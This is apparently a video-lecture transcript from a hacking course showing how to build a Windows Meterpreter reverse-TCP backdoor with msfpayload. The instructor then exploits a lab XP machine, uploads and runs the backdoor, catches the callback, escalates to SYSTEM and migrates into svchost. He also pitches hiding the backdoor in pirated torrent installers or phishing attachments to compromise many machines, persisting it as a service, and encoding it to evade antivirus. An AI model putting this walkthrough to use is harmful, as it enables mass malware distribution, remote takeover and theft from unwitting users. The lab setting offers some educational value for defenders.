Alright, so in this video we're going to get into some pretty cool, exciting things. We're going to actually talk about payloads. And we're going to talk about actually creating our own Trojans, our own backdoors, viruses, whatever, depending on who you talk to. And so this is pretty cool. We would use this, for example, a lot of people will use this for torrents, for example. There's thousands of people that will pirate software, whether it's games, whether it's software like, expensive stuff like Adobe Photoshop or Adobe Suite or whatever it is. Just thinking off the top of my head, I mean, there's a lot of stuff out there that people will put up, and it can be a legitimate software. It'll install, it'll function properly. You can do everything that I mean, everything looks good. But you can bundle your virus or your backdoor with the software or with the installer. Or, for example, we can create our own, let's say, a patch. We can say, hey, go ahead and install the program and then run this patch. This patch will patch the system, or whatever story. You get creative in how you think you're going to do this. There's so many different ways that this can be done, and a lot of it is there's so many people that pirate stuff and download things, especially through torrents. I just use that as an example, not to scare you away from torrents or anything, but it's, hey, I mean, this is something that by the time that you are done with this video or this video series, you will know how to do this. And if you can know how to do this, then there's definitely other people that know how to do this as well. So those are the dangers, but those are also the possibilities. So it might not be crafted, our backdoor might not be crafted for just one target. So we can throw it up on a torrent, for example, which we're not. We're not going to do anything illegal. But, if we did that, there would be probably within the first few hours, we would probably have, depending on the type of software that you advertised or whatever, we might get hundreds. Or, in a day we might have 1,000 downloads. And that's potentially 1,000 systems that we could have compromised. So you can see that it's a very serious thing to think about. And just be aware of that. If you do any kind of torrenting or anything like that, just be very aware of what's going on. So anyhow, Msfpayload, we can actually do this from inside the Metasploit console, but we're going to do this outside. So we're going to just get used to using the Msfpayload command, and later on we're going to look at some other tools that we can combine this with to try and make it pretty tricky, try to actually get past antivirus and that sort of thing. Now, in the last video, we killed antivirus. So in this case, we could just generate a payload, throw it on there, and it would work. We could actually upload this to our victim machine if we've exploited it. There's just so many different possibilities. So let's just go ahead and get in this, and as we go along through the video or different videos, then we'll start taking a look at different examples and different things that we can do. So the first thing that I'm going to do is just type in an Msfpayload. And what this is going to do is this is going to show us where it's loading from and the usage. Here we go. We can see that it's loading from OPT Metasploit apps. That's the file structure where it's being loaded from. And then it wants options, the payload type, and a bunch of other things. Now we can generate this payload in a C program, C#, Perl, Ruby. We can do all the raw output. You can see up here, JavaScript, exe, DLLs. So there's even one for Python. So you can generate this in a language of your choosing. And then if we wanted to, for example, try and exploit a Linux machine, well, the Linux machine, we're not going to be able to run exe files. So maybe we'll use a Python, or we'll use a C program, for example, or a Java, Perl, something that the machine can understand. So just keep that in mind. But because we're going to be using Windows, we're definitely going to be generating exes. So what we're going to go ahead and do now is we're going to do an Msfpayload, and we can do a -L, and this is going to list the available payloads. Now, I believe everything that's in Metasploit, it's the same for Msfpayload. So we would like to use the Windows Meterpreter Reverse TCP. Let's just wait here another second. It's got to load, go through all these programs. There we go. And it's not very pretty looking because my screen is smaller. But let's go ahead and look for Windows, you can see that there's some shell in there, which, hey, if we've got Meterpreter, why use a shell? So let's look for Windows. Here, oh, close. There we go, right there. Windows /Meterpreter / reverse TCP, just like in the MSF console. So we're going to do an MSF payload, Windows /Meterpreter, reverse TCP. Now, what do we need? We can do a capital O, and this will show us our options. So let's wait here for another 10 years. Okay. There we go. So we need to tell it as much information as possible. Now we can see that there's default values. Obviously, it should look just like it did in the MSF console. Exit function, we can change it to thread or whatever, you know. Well, we can leave that alone. We can even leave the L port alone. Also, all we really need to do is specify the L host. But we can change the L port and everything just like we can in MSF console. So MSF payload, Windows /Meterpreter / reverse _ TCP, and I'm going to specify L host equals, don't put any spaces in this one, 192.168.1.101 because my local IP is 101. And obviously we can now craft this if we wanted to go across the internet, which we will get into that in later videos, but right now we just got to stick to the basics so that you get comfortable with using this. So if we wanted to, we could specify the L port if we wanted to change 4444, whatever it is. So now what we need to do is there is something that we're going to do X. Now if we go up, we'll notice that the X is for EXE. We want to generate an EXE. You'll see X. X is actually capitalized. So let me just capitalize the X. Now I'm going to use an arrow and or you know your greater than, less than signs. Basically just hold down shift and press the period. You should get the same symbol I did. And now we're going to go ahead and name the file. So I can name this, let's say, test backdoor1.exe, because we'll probably make different ones. So we're going to name the file what we want it to be named, and we should just be able to hit enter and see what it does. If we don't do the X and then specify the file name, then it would generate the payload, but it wouldn't save it. So make sure that we do the capital X and the other code there at the end. Okay. Now, I did not specify a location to save it, so I'm going to do an ls and see if it saved it here. Now we named it test backdoor1.exe. There it is. So it's going to place it, if we don't specify where to put it, it's going to place it in the current directory. So our host at Kali, we're in the, or not our host, but root at Kali, we're in the root directory. So it's going to place that there. So that's going to be extremely important for you to remember, because when we go to upload this onto the system, we need to know where that is. So the next thing that we're going to do is we're going to try to get it on this machine. Now, I'm not going to get into how to get it on this machine. We're going to do it, but the way that we're going to do it really doesn't make any sense, because we're going to exploit the machine. Now, you could send this in an email. You could, like say, a torrent. That's a perfect example. Basically, how you get it on the machine, I can't help you with that. That's involving social engineering. That's picking and choosing your targets and crafting how you do it. Tailoring it to the company or individual, whatever it is. So basically, we need to get this payload on the system. Now, what I can do is I can show you how to exploit the machine and then upload this file. Now, in a real scenario, we actually shouldn't even need to exploit this system. With the MSF payload, we're generating the payload. Once the payload is on the machine, we don't need to exploit it. The machine will call back to us. So that's why we really technically wouldn't have to exploit it. But I know that if that sounds confusing, I apologize, but I'm just trying to explain it the best that I can. So in a real life situation, we wouldn't need to exploit it. I mean, let's say we use the torrent example. Well, we don't know all the different IP addresses and stuff that, to exploit. So that's why we use the payload, and the payload will call back to us. So we technically will not have to exploit the machine. I hope that makes sense. In this case, we're going to exploit the machine because that's going to be the easiest way for us to get this file on that system. So let's go ahead and start up MSF console. Remember that our test backdoor 1.exe is in our root folder. We're going to need to remember that. And where we're going to basically probably just put this is probably just straight on the C drive. And then we're going to go ahead and execute it. Now the cool thing is later on in future videos, we're going to go ahead and bundle this with existing exes, like I may have mentioned before, like your Notepad, Solitaire, things that are already on the system, that are on every Windows computer. Calculators, another good example that we can use. So we'll even add these as services. We can add this exe to run as a service so that it starts every time the system starts. We'll even go into that a little bit later. So now that we're in this, I'm going to go ahead and use exploit /Windows interpreter. Oops, we're not there yet. SMB MS08 set payload. Here we go. Windows interpreter. Hey, it's the same exact payload that we just generated. And reverse TCP. I'm going to set my R host 192.168.1. I believe it's 106 is the XP machine. Set my L host 192.168.1.101. Let's show options. Everything looks good there, and exploit. Alright, cool. So we are on the system, and now what we can do is there's a download and there's an upload command. And so if we do a question mark, let's see if we can find that, which should be up here. Okay, upload a file or directory. And then there's download a file or directory. So what we're going to go ahead and try to do is we're going to try and upload this to the system. We're not downloading this on another system, we're uploading it to another system. If we wanted to pull files from the other system, the XP machine, onto our computer, then that would be a download. But we're going to upload. So we're going to do upload. We need to specify the file location /root/test backdoor 1. I was able to use my tab key and it automatically filled it out, which is awesome. And now we're going to load it on the C drive, just like that, of the Windows machine. And we may need to use an extra backslash or whack, an escape character. We'll see if that works. And it uploaded it. Cool. So I used the // you may need to do that, or the double whack whack. You may need to do that. I'm not sure, but give it a shot. And now we can go ahead and do a pwd. That's our present working directory. And so we can actually change this and now do a pwd, and now we're in the C drive. So that's cool. So we could have done that and we wouldn't have had to specify. I think we do have to specify the C:// but let's say if we wanted to put it, let's say that we were in the C drive and we wanted to put it in system 32, we would want to do the C:/whack, put another whack in there, Windows, 2 more whacks, not just one, system 32, whatever. So you're going to need to get familiar with the location of where you want to put it. You need to make sure that it's in the right place. Otherwise, we're not going to find it. So just for this video, I'm going to simulate as if I am the user. We can go into way more cool stuff here in the next couple of videos, but let's go ahead and go to my computer. And let's go ahead and go into the C drive because it should be in there. And there's our test backdoor. Now what happens if we launch this? Right now there's nothing that's going to happen. We need to set up what's called a handler. And what this is going to do is it's going to listen. So I'm going to get out of my interpreter, and what it's going to do is it's going to listen on our port that we specified. Now, if you remember the port, I believe it was 4444. So we need to set up our handler or our listener to be listening on port 4444, because this is going to call back to us. So use see if this works here. There we go. Use exploit / multi / handler. Show options. And there's no options. What we're going to go ahead and do is we're going to set the L port to 4444. Show options. No, it's not in there. Let's just go ahead and run that. Okay, so it's automatically on 4444. Let's go ahead and run this back door. And it's just sitting there, but let's see if there's anything going on over here. Ah, well, look at that. We've got our interpreter session. So we'll go ahead and explore the other values of setting the L port. How do we set up for a different port if we're going to do the handler? I'll go into that a little bit more in the next video. So now we have, nothing's happened over here. Everything looks normal, but we got our interpreter session. Now let's do a PS and see what's going on. We can see that test backdoor1.exe is running in the background. So if they were to close this process, we would lose our interpreter session. So we would want to try to migrate it to SVC host or something like that. But let's do a get UID. We're xpvm1 / researcher. We are not the NT authority or system. So this would be a great example of to use the get system command to try and escalate our privileges. So let's do a get system and see if we can grab. There we go. Got system via technique 1. Now let's get UID. We are now NT authority / system. So good example on privilege escalation right there. Let's do a get PID. We are process 1868 now. 1868, we're still the same thing. We are test backdoor. So now that we're NT authority, now we should probably try and migrate to an NT authority process. If we were the xpvm1 researcher, it would probably not let us migrate. So that's why we want to try and get system first. You can try whatever you like, but if we can get system, you want to go for that. So now what we're going to go ahead and do is migrate. I'm going to go to 908. Migrate 908. And we were able to successfully migrate. Awesome. Get PID. We are 908. So now they can close. They say, I wonder what's going on. I'm going to do a Control-Alt-Delete. And let's see if it's in here. And doesn't look like it's in there. When we did our migrate, it may have closed it out. Let's do another PS. See if it's still in there. Yeah, and it's gone. So when we migrated it, the process went away, so it's not there anymore. But what I was going to do was just show you that if we killed the process, we would still have our interpreter session, because we are now running as the SVC host, or one of them anyway. So that's your first intro, I guess, on Msfpayload, kind of how it works. We kind of did things a little funky, trying to get on the system. The other way that we could have done it was we could send an email. We could set up like a fake email, attach it, and then have them download it and execute it on their system. That's just a lot of work involved, and so just for purposes of the video, I didn't do that. instead of you got to do the upload command, learn how to upload something to the system, and then obviously we can execute it as the user. In future videos, we're going to go over a lot more with Msfpayload. If you're running an antivirus at this point, it would have probably caught it, because we didn't do anything to get past the antivirus as far as the exe. In previous videos, we showed you how to get around the antivirus, hopefully disabling the services and so forth. But if you don't do that and we upload this exe, we risk the chance of being flagged by the antivirus. And so there's something called MSF encode that we can use, and we can use different encoders, and we can obscure the data over and over and over and over again to where we can jumble it so we can try and fool the antivirus. The antivirus is going to look for certain strings or certain definitions, certain patterns, and that's what's going to flag the antivirus. So we can go in there and try and obscure that data, encode it, like, say even like 100 times, and so the antivirus wouldn't recognize it. We can set this up as a service so that every time this person's computer starts, it calls to us. A lot of different things that we can do. We'll go and explore that in the future videos, so I hope you enjoyed the first video on Msfpayload.